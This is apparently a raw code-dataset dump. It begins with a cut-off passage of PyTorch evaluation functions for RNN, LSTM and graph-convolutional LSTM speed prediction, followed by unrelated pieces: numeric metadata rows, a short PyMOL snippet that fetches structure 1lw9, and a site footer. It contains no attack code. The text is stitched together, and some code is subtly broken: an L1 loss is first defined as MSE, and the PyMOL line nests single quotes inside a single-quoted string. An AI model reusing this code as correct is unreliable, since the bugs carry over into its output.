[batch_size, step_size, fea_size] = inputs.size()
cur_time = time.time()
pre_time = time.time()
use_gpu = torch.cuda.is_available()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.MSELoss()
tested_batch = 0
losses_mse = []
losses_l1 = []
for data in test_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
# rnn.loop()
hidden = rnn.initHidden(batch_size)
outputs = None
for i in range(10):
outputs, hidden = rnn(torch.squeeze(inputs[:,i:i+1,:]), hidden)
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
loss_mse = loss_MSE(outputs, labels)
loss_l1 = loss_L1(outputs, labels)
losses_mse.append(loss_mse.data)
losses_l1.append(loss_l1.data)
tested_batch += 1
if tested_batch % 1000 == 0:
cur_time = time.time()
print('Tested #: {}, loss_l1: {}, loss_mse: {}, time: {}'.format( \
tested_batch * batch_size, \
np.around([loss_l1.data[0]], decimals=8), \
np.around([loss_mse.data[0]], decimals=8), \
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
losses_l1 = np.array(losses_l1)
losses_mse = np.array(losses_mse)
mean_l1 = np.mean(losses_l1) * max_speed
std_l1 = np.std(losses_l1) * max_speed
print('Tested: L1_mean: {}, L1_std : {}'.format(mean_l1, std_l1))
return [losses_l1, losses_mse, mean_l1, std_l1]
def TestLSTM(lstm, test_dataloader, max_speed):
inputs, labels = next(iter(test_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
cur_time = time.time()
pre_time = time.time()
use_gpu = torch.cuda.is_available()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.MSELoss()
tested_batch = 0
losses_mse = []
losses_l1 = []
for data in test_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
Hidden_State, Cell_State = lstm.loop(inputs)
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
loss_mse = loss_MSE(Hidden_State, labels)
loss_l1 = loss_L1(Hidden_State, labels)
losses_mse.append(loss_mse.data)
losses_l1.append(loss_l1.data)
tested_batch += 1
if tested_batch % 1000 == 0:
cur_time = time.time()
print('Tested #: {}, loss_l1: {}, loss_mse: {}, time: {}'.format( \
tested_batch * batch_size, \
np.around([loss_l1.data[0]], decimals=8), \
np.around([loss_mse.data[0]], decimals=8), \
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
losses_l1 = np.array(losses_l1)
losses_mse = np.array(losses_mse)
mean_l1 = np.mean(losses_l1) * max_speed
std_l1 = np.std(losses_l1) * max_speed
print('Tested: L1_mean: {}, L1_std : {}'.format(mean_l1, std_l1))
return [losses_l1, losses_mse, mean_l1, std_l1]
def TestGraphConvolutionalLSTM(gclstm, test_dataloader, max_speed):
inputs, labels = next(iter(test_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
cur_time = time.time()
pre_time = time.time()
use_gpu = torch.cuda.is_available()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
tested_batch = 0
losses_mse = []
losses_l1 = []
for data in test_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
Hidden_State, Cell_State = gclstm.loop(inputs)
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
loss_mse = loss_MSE(Hidden_State, labels)
loss_l1 = loss_L1(Hidden_State, labels)
losses_mse.append(loss_mse.data)
losses_l1.append(loss_l1.data)
tested_batch += 1
if tested_batch % 1000 == 0:
cur_time = time.time()
print('Tested #: {}, loss_l1: {}, loss_mse: {}, time: {}'.format( \
tested_batch * batch_size, \
np.around([loss_l1.data[0]], decimals=8), \
np.around([loss_mse.data[0]], decimals=8), \
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
losses_l1 = np.array(losses_l1)
losses_mse = np.array(losses_mse)
mean_l1 = np.mean(losses_l1) * max_speed
std_l1 = np.std(losses_l1) * max_speed
print('Tested: L1_mean: {}, L1_std : {}'.format(mean_l1, std_l1))
return [losses_l1, losses_mse, mean_l1, std_l1]
| 36.163859
| 178
| 0.53339
| 2,542
| 23,615
| 4.675452
| 0.072777
| 0.028271
| 0.021203
| 0.024232
| 0.880522
| 0.865966
| 0.852419
| 0.845099
| 0.836096
| 0.831637
| 0
| 0.0164
| 0.369977
| 23,615
| 652
| 179
| 36.219325
| 0.78243
| 0.02617
| 0
| 0.847727
| 0
| 0
| 0.022604
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015909
| false
| 0
| 0.011364
| 0
| 0.043182
| 0.040909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8fac7d25cbc629323ca9ceeb456b2e1d16073b2
| 294
|
py
|
Python
|
jupyterlab2pymolpysnips/WaterPentagon/waterTriple.py
|
MooersLab/pymolpysnips
|
50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
|
[
"MIT"
] | null | null | null |
jupyterlab2pymolpysnips/WaterPentagon/waterTriple.py
|
MooersLab/pymolpysnips
|
50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
|
[
"MIT"
] | null | null | null |
jupyterlab2pymolpysnips/WaterPentagon/waterTriple.py
|
MooersLab/pymolpysnips
|
50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
|
[
"MIT"
] | null | null | null |
"""
cmd.do('fetch 1lw9, async=0; ')
cmd.do('zoom resi 313; ')
cmd.do('preset.technical(selection='all', mode=1);')
"""
cmd.do('fetch 1lw9, async=0; ')
cmd.do('zoom resi 313; ')
cmd.do('preset.technical(selection='all', mode=1);')
# Description: triple water pentagon.
# Source: placeHolder
| 22.615385
| 52
| 0.656463
| 44
| 294
| 4.386364
| 0.477273
| 0.15544
| 0.103627
| 0.145078
| 0.756477
| 0.756477
| 0.756477
| 0.756477
| 0.756477
| 0.756477
| 0
| 0.053846
| 0.115646
| 294
| 12
| 53
| 24.5
| 0.688462
| 0.193878
| 0
| 0
| 0
| 0
| 0.634783
| 0.234783
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.